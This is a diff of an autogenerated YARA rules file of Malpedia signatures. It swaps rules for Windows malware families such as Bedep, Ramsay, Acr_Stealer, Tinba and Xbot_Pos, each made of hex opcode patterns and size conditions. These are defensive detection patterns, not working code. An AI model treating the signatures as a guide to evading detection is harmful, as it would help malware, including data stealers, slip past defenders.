+		$sequence_2 = { e8???????? 48c70702000000 4883fb01 740e 89d8 83e002 4885c0 }
+		$sequence_3 = { e8???????? 80385d 750b 8b4b58 394804 7503 897004 }
+		$sequence_4 = { e8???????? 488d8d801e0000 e8???????? 0f28742470 0f287c2460 440f28442450 4881c488000000 }
+		$sequence_5 = { e8???????? 4c8d442450 488bd0 488bce 488be8 e8???????? 8bf8 }
+		$sequence_6 = { e9???????? 4d892e e8???????? 85c0 0f84e9040000 4d85ff 0f84e0040000 }
+		$sequence_7 = { eb0e 44894c2434 498bf0 4983f8ff 7448 488b9778010000 458bc7 }
+		$sequence_8 = { eb34 4585c9 7407 b9180a0100 eb28 3bd7 7607 }
+		$sequence_9 = { eb02 31c0 4883c428 c3 488b01 488b4808 8b4010 }
 
 	condition:
-		7 of them and filesize < 1492992
+		7 of them and filesize < 9285632
 }
-rule MALPEDIA_Win_Bedep_Auto : FILE
+rule MALPEDIA_Win_Iisniff_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "50676d12-901b-5467-9cc0-ebfacf6cdb1b"
+		id = "6c640864-5993-563c-afe7-e26ca8c22f49"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bedep_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.iisniff_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "3972e680d8fcfe1f525b24f026ad26b3e506bdc906b9b363e15bad8bf5e7bda8"
+		logic_hash = "110e5f48ca56611bc57ccb877448c194f26647c840b794b9ff7133caff38a207"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104157,32 +104373,37 @@ rule MALPEDIA_Win_Bedep_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4608 50 ff75e8 90 e8???????? 84c0 7406 }
-		$sequence_1 = { 8d4608 50 e8???????? 68???????? 8d4610 50 e8???????? }
-		$sequence_2 = { 7d0f 8b11 8910 8b4904 894804 e9???????? 395de8 }
-		$sequence_3 = { 8930 897704 eb6c 8b5610 8b4710 83c23f 83e2c0 }
-		$sequence_4 = { ff9424d8010000 8bd8 85db 7504 6af1 ebda 6a0e }
-		$sequence_5 = { ff5108 8b45fc 5b c9 c20c00 6898000000 6a00 }
-		$sequence_6 = { 7605 8bd8 895df0 33d2 8d46ff f7f3 }
-		$sequence_7 = { ff751c ff750c ff7508 68???????? e8???????? 5d c22800 }
-		$sequence_8 = { 5e 5b c9 c21800 55 8bec 81ec80000000 }
-		$sequence_9 = { 51 56 8b35???????? 85f6 0f8d9b000000 6a05 b004 }
+		$sequence_0 = { 8d7dd4 e8???????? 8b45e8 8d5d9c 8bf7 8945bc e8???????? }
+		$sequence_1 = { 8b4c240c 51 53 8d8424b4000000 e8???????? }
+		$sequence_2 = { 56 83c710 e8???????? 59 }
+		$sequence_3 = { 8d742434 e8???????? 33db 6aff }
+		$sequence_4 = { 83c404 39bc24d8000000 7210 8b8424c4000000 }
+		$sequence_5 = { 59 59 e9???????? 33ff eb90 56 }
+		$sequence_6 = { 56 8bcf e8???????? 8b442460 3bf0 770c 6aff }
+		$sequence_7 = { 8d4c0c50 6a02 e8???????? 397c2414 0f8db1feffff }
+		$sequence_8 = { ff704c e8???????? 59 83f8ff 0f852cffffff }
+		$sequence_9 = { e8???????? 3bf0 7429 8b542418 4e ebd9 837c240c10 }
+		$sequence_10 = { 6a03 68000000c0 68???????? ff15???????? 6a02 }
+		$sequence_11 = { 889c24c4000000 39bc24f4000000 7210 8b8424e0000000 50 e8???????? 83c404 }
+		$sequence_12 = { e8???????? 8b442414 8b4004 6a0a 8d440418 50 }
+		$sequence_13 = { 50 8975ec e8???????? 8975fc 807de800 7507 be04000000 }
+		$sequence_14 = { 51 8d842434010000 50 894c2418 }
 
 	condition:
-		7 of them and filesize < 557056
+		7 of them and filesize < 1441792
 }
-rule MALPEDIA_Win_Cryptoshield_Auto : FILE
+rule MALPEDIA_Win_Ramsay_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d469a41b-f805-5bc0-8014-b5aff846fede"
+		id = "ca34f65f-e875-5b7a-bc28-21fb62ed4b88"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptoshield_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ramsay_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "51b27f3518a9a59f8c494e0c229ea4ed8eee50ea1c264f413a97b5fd3e98710d"
+		logic_hash = "9a41eaab55357b928cd2c1b68d94938a51a46b8558bc541d5b896032a4300700"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104196,34 +104417,40 @@ rule MALPEDIA_Win_Cryptoshield_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf8 33db eb44 ff75f8 }
-		$sequence_1 = { 7419 ff33 ff15???????? 8b4d0c 8b45f0 8901 }
-		$sequence_2 = { 8b4508 50 8945f0 8d4508 50 57 }
-		$sequence_3 = { 7405 83fe04 7563 6808020000 8d442424 }
-		$sequence_4 = { 56 ff15???????? 6a00 8d85e8fbffff 50 6a01 }
-		$sequence_5 = { 740e 0fb74802 83c002 6685c9 75ef eb12 66833800 }
-		$sequence_6 = { 8bfa 744d 8d4900 0fb732 }
-		$sequence_7 = { ff15???????? 8bf0 83fe03 7413 83fe02 }
-		$sequence_8 = { 6685c0 743b 8bf0 8d642400 }
-		$sequence_9 = { ff33 ffd6 ff75fc ff15???????? ff75f8 }
+		$sequence_0 = { ff15???????? 85c0 7502 eb02 ebb1 }
+		$sequence_1 = { 7514 ff15???????? 83f820 7502 eb07 33c0 }
+		$sequence_2 = { 8b4de8 83b9a001000006 753f c745f401000000 c745f800000000 eb09 }
+		$sequence_3 = { 732c e8???????? 33d2 b93e000000 f7f1 8955f4 }
+		$sequence_4 = { 8b4508 8a481e 884a03 8b5508 8b4508 8a4815 884a1e }
+		$sequence_5 = { c745e800000000 c745ec00000000 c745f088020000 c745f400000000 6888020000 }
+		$sequence_6 = { 8945fc 6a00 6a00 8b55f8 52 8b45fc 50 }
+		$sequence_7 = { 6a00 8d55f4 52 8b450c 8b08 }
+		$sequence_8 = { 8b55e8 0355f8 8a8294010000 8801 ebd3 eb0a 8b4de8 }
+		$sequence_9 = { 8a45ff 884207 c645f000 33c9 894df1 }
+		$sequence_10 = { ff15???????? 33c0 e9???????? e8???????? 85c0 7507 33c0 }
+		$sequence_11 = { e9???????? 41b908000000 4c8d057b560200 8b9424e8010000 }
+		$sequence_12 = { e9???????? 41b80e000000 488d542450 488b8c2408050000 }
+		$sequence_13 = { e9???????? 41b868000000 33d2 488d8c2400070000 }
+		$sequence_14 = { e9???????? 41b8280a0000 33d2 488d4c2460 }
+		$sequence_15 = { e9???????? 41b908000000 4c8d05929b0200 8b542420 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 2031616
 }
-rule MALPEDIA_Win_Polyglot_Ransom_Auto : FILE
+rule MALPEDIA_Win_Advisorsbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0ac13ffc-60b5-57b4-bdac-0ba216f69178"
+		id = "d26aaef7-489b-5eb4-8cea-1ab552de40d6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.polyglot_ransom_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.advisorsbot_auto.yar#L1-L166"
 		license_url = "N/A"
-		logic_hash = "207fa5f26622dfd1aef2c3f100c53d4dd46542c0aab03454309445c1893ebb78"
+		logic_hash = "b714abe1aa8dcb7f6377853b7e4c0df837d586795e3163f35470e362238d5477"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -104235,32 +104462,40 @@ rule MALPEDIA_Win_Polyglot_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b020 d0bdd0b5d0bc 20d1 81d0bbd0b5d0 b4d1 83d18e }
-		$sequence_1 = { d0bed0b3d180 d0b0d0bcd0bc d1832e0d0a3c 61 20636c 61 7373 }
-		$sequence_2 = { 334218 0fb655f5 8945f0 8b45f8 c1e810 23c6 8945e4 }
-		$sequence_3 = { 3bf3 8b3f 7437 395e44 7532 83ff1f 742d }
-		$sequence_4 = { 8806 46 47 803f00 75ab 5f c60600 }
-		$sequence_5 = { 74b2 39750c 7514 8db364ffffff 8d7dd4 a5 a5 }
-		$sequence_6 = { 53 6880000000 6a02 53 6a02 6800000040 8d8500f0ffff }
-		$sequence_7 = { 81c634ffffff 8d4dec e8???????? 8b4620 834dfcff 39706c 7514 }
-		$sequence_8 = { 3e51 7565 7374 65206973 7472 757a 696f6e6920736f }
-		$sequence_9 = { 8bec 83ec20 56 ff7514 8d45e0 50 8bf1 }
+		$sequence_0 = { 8bc1 2bc2 d1e8 03c2 c1e808 }
+		$sequence_1 = { b89b01a311 f7e1 2bca d1e9 03ca }
+		$sequence_2 = { 8bc2 33d2 c1e808 f7f1 }
+		$sequence_3 = { 8bc2 33d2 c1e809 f7f1 }
+		$sequence_4 = { d1e8 03c2 33d2 c1e809 }
+		$sequence_5 = { b80923ed58 f7e1 8bc1 2bc2 }
+		$sequence_6 = { 8b442408 8b4c2408 33d2 f7f1 }
+		$sequence_7 = { 8bc2 c1e807 33d2 f7f1 }
+		$sequence_8 = { d1e9 03ca c1e909 33c8 }
+		$sequence_9 = { 8bc2 33d2 c1e804 f7f1 }
+		$sequence_10 = { d1e9 03ca c1e907 2bc1 }
+		$sequence_11 = { d1e9 03ca 33d2 c1e908 }
+		$sequence_12 = { 5e 5d 0fb7c2 5b }
+		$sequence_13 = { 668b4c2410 5f 5e 5d 0fb7c1 5b }
+		$sequence_14 = { 0fb6c1 0fb6ca 33d2 f7f1 }
+		$sequence_15 = { 0fb7c0 0fb7c9 33d2 f7f1 }
+		$sequence_16 = { 0fb6c0 0fb6c9 33d2 f7f1 }
+		$sequence_17 = { 668b442410 5f 5e 5d 0fb7c0 5b }
 
 	condition:
-		7 of them and filesize < 1392640
+		7 of them and filesize < 434176
 }
-rule MALPEDIA_Win_Rook_Auto : FILE
+rule MALPEDIA_Win_Murkytop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f7d50ee5-0cf7-58f1-9491-c0b1413c9c03"
+		id = "09c2c9ad-2fc4-523f-99a2-d7f06ef6936d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rook"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rook_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.murkytop_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "8ce4aaa97754380ef7f8444fbf7c6b6bdd739dd7cb13bc80ec0f235cec755f83"
+		logic_hash = "e4a555eba2d93ac52653d0ddd1b98a4be2b8b9fd7f1c8d48fbca611f1976d1c2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104274,32 +104509,32 @@ rule MALPEDIA_Win_Rook_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb07 488d1d1a030200 4883a4249800000000 4084f6 }
-		$sequence_1 = { 488b8da0260000 ff15???????? 4c8b85a0260000 33ff 48897c2438 448bc8 48897c2430 }
-		$sequence_2 = { 48897de0 e8???????? 85c0 0f8401010000 488d0507f00100 4a8b04e8 }
-		$sequence_3 = { 483d00100000 7324 0f1f00 486385f0070000 42c6042800 ff85f0070000 }
-		$sequence_4 = { 7631 0f1f840000000000 488d0c5b 48c1e104 4803cf f6410c02 7407 }
-		$sequence_5 = { 48630d???????? 488b05???????? 4c890cc8 488d0d4a640500 }
-		$sequence_6 = { 488d0d13b30000 488b45d8 488908 488d0dc5250200 }
-		$sequence_7 = { 488b0d???????? 4c8d4540 ba08000000 ff15???????? 488bd8 }
-		$sequence_8 = { 488d0d63410400 480f440d???????? 48890d???????? 488d0d6d2c0500 }
-		$sequence_9 = { 440f47e8 44896c2448 418d45ff 0fb68c82e2220400 0fb6b482e3220400 8bd9 8bf8 }
+		$sequence_0 = { 8b35???????? c7450800000000 90 6800100000 8d8dd0eeffff 6a00 51 }
+		$sequence_1 = { e8???????? 8b5de0 8b75dc 8d4dec 83c418 8bf8 }
+		$sequence_2 = { eb0b 3d2f050000 0f855fffffff 8b45f4 85c0 }
+		$sequence_3 = { 77cf 56 ff15???????? 85c0 74c4 8b500c }
+		$sequence_4 = { 52 50 51 68???????? e8???????? 83c424 6a00 }
+		$sequence_5 = { 52 56 68???????? e8???????? 8b45fc }
+		$sequence_6 = { 6a01 51 ff15???????? 3bc6 743f 50 ff15???????? }
+		$sequence_7 = { 51 52 0fb6c0 50 68???????? 53 }
+		$sequence_8 = { eb08 8b4608 e8???????? 47 3b7d08 0f8c55ffffff 83fb05 }
+		$sequence_9 = { 33f6 8b4dfc 8b511c 52 }
 
 	condition:
-		7 of them and filesize < 843776
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Roopirs_Auto : FILE
+rule MALPEDIA_Win_Xbot_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "57676d4c-d0d7-5b4f-80a4-819b4d474425"
+		id = "2a6bf949-203e-5838-9302-120351d13e42"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.roopirs_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xbot_pos_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "d4e144778ab9b98b475c3cbfeb400528a9373556893774f62bba1f2eb8f36265"
+		logic_hash = "64b7d710b96434b08fc5c38afe005807adccf502aa66b286ce03ea7fb875f890"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104313,32 +104548,32 @@ rule MALPEDIA_Win_Roopirs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745fc47000000 8b4dd8 51 68???????? ff15???????? 8945c0 }
-		$sequence_1 = { 50 ff15???????? 898530ffffff eb0a c78530ffffff00000000 33c9 837da800 }
-		$sequence_2 = { ff15???????? 8d4db0 ff15???????? c745fc07000000 833d????????00 751c 68???????? }
-		$sequence_3 = { 8945b0 837db000 7d1d 6a20 68???????? 8b45dc 50 }
-		$sequence_4 = { 8d55d4 52 6a05 ff15???????? 83c418 8d45bc 50 }
-		$sequence_5 = { 8b02 8b4d80 51 ff5014 dbe2 89857cffffff }
-		$sequence_6 = { 8b4508 50 8b08 ff5104 8b5514 56 8d45bc }
-		$sequence_7 = { c78544ffffff00000000 8b45ac 89458c 8d4dcc 51 8b558c }
-		$sequence_8 = { 68???????? 68???????? ff15???????? c78548ffffffd4624000 eb0a }
-		$sequence_9 = { 8d4dc8 ff15???????? c745fc07000000 8b4dd8 51 68???????? }
+		$sequence_0 = { 8945ec 837dec00 7410 8b4dec e8???????? }
+		$sequence_1 = { 50 8b4d08 e8???????? 50 8b4dec e8???????? 8b08 }
+		$sequence_2 = { e8???????? 8d8df8fcffff e8???????? 8d85d8fcffff 50 8b4d08 e8???????? }
+		$sequence_3 = { 8b4508 83e03f 6bc830 8b1495e0465600 03d1 b801000000 6bc800 }
+		$sequence_4 = { 8b4d0c c1f906 8b550c 83e23f 6bc230 8b0c8de0465600 8b55dc }
+		$sequence_5 = { e8???????? 0fb68593feffff 85c0 7431 8d4580 50 }
+		$sequence_6 = { 6bc830 8b1495e0465600 0fb6440a28 2580000000 7541 8b4de4 51 }
+		$sequence_7 = { 8d850cfdffff 50 8b4d08 e8???????? 89851cfcffff }
+		$sequence_8 = { 8945ec 837dec00 7417 8b45f8 83780800 740e 8b45ec }
+		$sequence_9 = { 00a58d49000e 8a4900 268b4900 52 8c4900 7e8d 49 }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 3031040
 }
-rule MALPEDIA_Win_Swen_Auto : FILE
+rule MALPEDIA_Win_Bka_Trojaner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d8e32210-7f2c-5375-83fe-4881f384b16a"
+		id = "74ec4af9-e2de-59bf-b310-d52e9a27c28c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.swen"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.swen_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bka_trojaner_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "ac8d371caed7f28c7b47b5b751d92511f3b33ed896fd2d2cdf37fc7b9a540873"
+		logic_hash = "b667f447169e58d5bdd1a72921cf0718ce5c118c508bba9ba523771b59233c38"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104352,32 +104587,32 @@ rule MALPEDIA_Win_Swen_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a03 68000000c0 8d8574ffffff 50 8b1d???????? }
-		$sequence_1 = { 834dfcff e9???????? e8???????? 85c0 0f8609010000 83a5388affff00 6a00 }
-		$sequence_2 = { 50 ff7508 57 8d85e0feffff 50 ffd6 83c410 }
-		$sequence_3 = { 85c0 0f8401030000 68???????? 68???????? 8d8574ffffff 50 8b35???????? }
-		$sequence_4 = { e8???????? 8d8504fbffff 50 57 e8???????? 6a70 57 }
-		$sequence_5 = { 8bf8 897dd8 85ff 7510 8b8570ffffff 8dbc0560dfffff 897dd8 }
-		$sequence_6 = { 6a03 bf000000c0 57 68???????? 8d850cffffff 50 e8???????? }
-		$sequence_7 = { ff15???????? 8945e0 3bc6 740e 6a01 56 }
-		$sequence_8 = { 53 6a06 ff15???????? 53 ff15???????? 8b4df0 64890d00000000 }
-		$sequence_9 = { ff7508 ff75e4 8d85d8feffff 50 e8???????? 83c40c }
+		$sequence_0 = { 894c2438 897c242c 897c2430 89542424 0f84c0010000 3bdf }
+		$sequence_1 = { 756b 837b1c00 7565 a1???????? }
+		$sequence_2 = { 6a00 8d44246c 50 56 ffd3 8b4d74 50 }
+		$sequence_3 = { 8d8170ffffff 83ec10 33d2 85c0 7410 }
+		$sequence_4 = { 6a00 50 894638 ff15???????? 8b4604 }
+		$sequence_5 = { 6a00 8d44246c 50 56 ffd3 }
+		$sequence_6 = { 85c0 7cd1 8b07 8b08 }
+		$sequence_7 = { 89842460080000 8d442420 50 68???????? 68???????? 33db 56 }
+		$sequence_8 = { 6a0c 68???????? e8???????? c745e4d0c64000 817de4d0c64000 }
+		$sequence_9 = { 8b542448 894104 8b44244c 895108 8b542464 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 221184
 }
-rule MALPEDIA_Win_Acr_Stealer_Auto : FILE
+rule MALPEDIA_Win_Lambert_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "27adbb62-681d-5315-be14-68aa5c14abca"
+		id = "810c5e09-e6d0-5a3a-ba2c-2c930c946f07"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acr_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.acr_stealer_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lambert_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "885dd5a2520c2a460bba6eeb3147670a114466803568b2f029aa5eef95499efd"
+		logic_hash = "a8d478aa8e5424a909999540bcd026478246ccf020747d754ccdbccaf24eff93"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104391,32 +104626,38 @@ rule MALPEDIA_Win_Acr_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 037e78 b900000000 6a1e 134e7c 52 51 898ea4000000 }
-		$sequence_1 = { 6a16 88850affffff 8d85f8feffff 50 ff7704 888d08ffffff }
-		$sequence_2 = { 8955e8 33c0 0fa4c803 53 c1e103 }
-		$sequence_3 = { e8???????? 8b55cc 0430 8b4de4 2375ac ff45f8 88040a }
-		$sequence_4 = { 81ff???????? 750a e8???????? 83c404 eb12 6a01 }
-		$sequence_5 = { c786c400000000000000 3bf9 8d96b0000000 1bc9 }
-		$sequence_6 = { c3 5f 5e b84f40902f ba3b6ae19a 5b 8be5 }
-		$sequence_7 = { 3a4101 751a 83fefe 7433 8a4202 3a4102 750d }
-		$sequence_8 = { 0f42f8 897a48 0fb74e1c 0fb7461e 03ce 83c02e }
-		$sequence_9 = { 79e9 8b55f8 41 03c1 2bf9 }
+		$sequence_0 = { 3bd8 0f82a4000000 83fe06 0f822cffffff }
+		$sequence_1 = { 3315???????? 05f0000000 832000 33f2 8b55e8 33ce 33d1 }
+		$sequence_2 = { 42 42 3bf9 0f84a8000000 81ef00400000 }
+		$sequence_3 = { 55 8bec 56 8b7510 c1fe04 }
+		$sequence_4 = { 2bc1 3bc7 0f82e5010000 8b4508 2bc2 8d7701 }
+		$sequence_5 = { 4e 8b1f 8919 2bf0 }
+		$sequence_6 = { 33f1 8b4de4 33ce 314de8 }
+		$sequence_7 = { 3bd8 0f826f010000 8a07 8801 41 }
+		$sequence_8 = { 8b55f4 8b4220 50 e8???????? 8945f8 }
+		$sequence_9 = { 8b4814 894df0 8b550c 8b4508 034220 }
+		$sequence_10 = { 03481c 894de4 8b55f4 8b45e4 }
+		$sequence_11 = { c1e90d 8b55f8 c1e213 0bca 894df8 8b45fc 0fbe08 }
+		$sequence_12 = { 7502 eb0b 8b55fc 83c201 8955fc }
+		$sequence_13 = { 8945ec 8b4d0c 8b5508 035124 8955f8 }
+		$sequence_14 = { 83c078 8945f0 8b4df0 83790400 7502 eb4c 8b55f0 }
+		$sequence_15 = { 0fb70c50 894df0 eb02 ebb8 }
 
 	condition:
-		7 of them and filesize < 1246208
+		7 of them and filesize < 1212416
 }
-rule MALPEDIA_Win_Tinba_Auto : FILE
+rule MALPEDIA_Win_Mydogs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8dfb27e2-54cb-58f0-8a40-15de14b5671d"
+		id = "9688d839-8d35-5299-b5ae-d8084dbff6c0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tinba_auto.yar#L1-L138"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mydogs_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "12776db9a2ca5e4e1bee242492b810213115a7f9fd4fce223ca3d2d59532f5e7"
+		logic_hash = "4d3f1e38f0e3ee2bcc850d56898106585e9b5f7ff2ecd490e245883ad04d625f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104430,35 +104671,32 @@ rule MALPEDIA_Win_Tinba_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b7508 ad 50 56 }
-		$sequence_1 = { 8b4510 aa 8b450c ab }
-		$sequence_2 = { 6a00 6a00 ff750c 6a00 6a00 ff7508 }
-		$sequence_3 = { 8a241f 88240f 88041f 41 }
-		$sequence_4 = { 0f84f2000000 49 89cf 49 }
-		$sequence_5 = { 8b4004 8b08 8b450c 8908 }
-		$sequence_6 = { 7506 8b4108 8b4014 85c0 7403 }
-		$sequence_7 = { b8436f6f6b ab b869653a20 ab 037df8 4f }
-		$sequence_8 = { 48 89ce 49 89c8 31c9 }
-		$sequence_9 = { 85c0 7403 b073 aa b83a2f2f00 ab 4f }
-		$sequence_10 = { 83ef0e 85c0 741b 66b80d0a 66ab }
-		$sequence_11 = { c22c00 55 89e5 53 e8???????? }
-		$sequence_12 = { 66894208 66894a0a ac 88c1 80e1fe 80f9c4 }
+		$sequence_0 = { 8b5d94 8b75cc 8b7dc8 85db }
+		$sequence_1 = { 8a01 88040a 41 84c0 75f6 3885c8feffff 0f84f6060000 }
+		$sequence_2 = { 66c745d90000 c645db00 c645dc00 c745f500000000 66c745f90000 c645fb00 c6459c00 }
+		$sequence_3 = { 6a00 8bcf 81e900803ed5 8bc6 6880969800 1ddeb19d01 50 }
+		$sequence_4 = { 72d7 61 9d 0fb605???????? f30f7e05???????? 8845a4 }
+		$sequence_5 = { 40 8945e4 8bc3 99 83e203 33c9 }
+		$sequence_6 = { 68???????? 68???????? 8d85f8feffff 50 ff15???????? 68???????? }
+		$sequence_7 = { 8bcf e8???????? 8bd0 8bce e8???????? 83c404 }
+		$sequence_8 = { 50 0fb744243a 50 68???????? 8d442450 682c010000 50 }
+		$sequence_9 = { ff15???????? 85c0 7518 6860ea0000 ffd6 6a00 8d442428 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 313344
 }
-rule MALPEDIA_Win_Sneepy_Auto : FILE
+rule MALPEDIA_Win_Sierras_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5ef3150e-2bf6-5a09-ba39-87be2aca4160"
+		id = "70c5a6f9-c2e5-57b1-90d8-8b9060fdf637"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sneepy_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sierras_auto.yar#L1-L167"
 		license_url = "N/A"
-		logic_hash = "93bb250be962b8e39c384decdfc047f665d0471aa8b95be7ae603f090eace95c"
+		logic_hash = "c05b0e9c28fed253d00c96c986fab4dbaf0e644651c700ec0227f1b00097c981"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104472,32 +104710,38 @@ rule MALPEDIA_Win_Sneepy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75e6 c6460401 830eff 2b34bd60314100 }
-		$sequence_1 = { 80e17f 3008 8b06 8bc8 c1f905 8b0c8d60314100 83e01f }
-		$sequence_2 = { 83c40c 8bc8 8a10 40 84d2 75f9 8dbdacfeffff }
-		$sequence_3 = { 6801000080 ff15???????? 85c0 754e 8b5508 8bc2 }
-		$sequence_4 = { c1f805 8d3c8560314100 8bf3 83e61f c1e606 }
-		$sequence_5 = { 83f86f 7518 56 e8???????? 8b55fc }
-		$sequence_6 = { e8???????? 83c40c 6a00 68ff000000 8d85c4feffff }
-		$sequence_7 = { 33c0 5d c3 8b04c524de4000 }
-		$sequence_8 = { 0f85f3020000 e8???????? 84c0 0f85e6020000 6800010000 6a00 }
-		$sequence_9 = { 75f6 33c0 68???????? 8945cc 8845d0 }
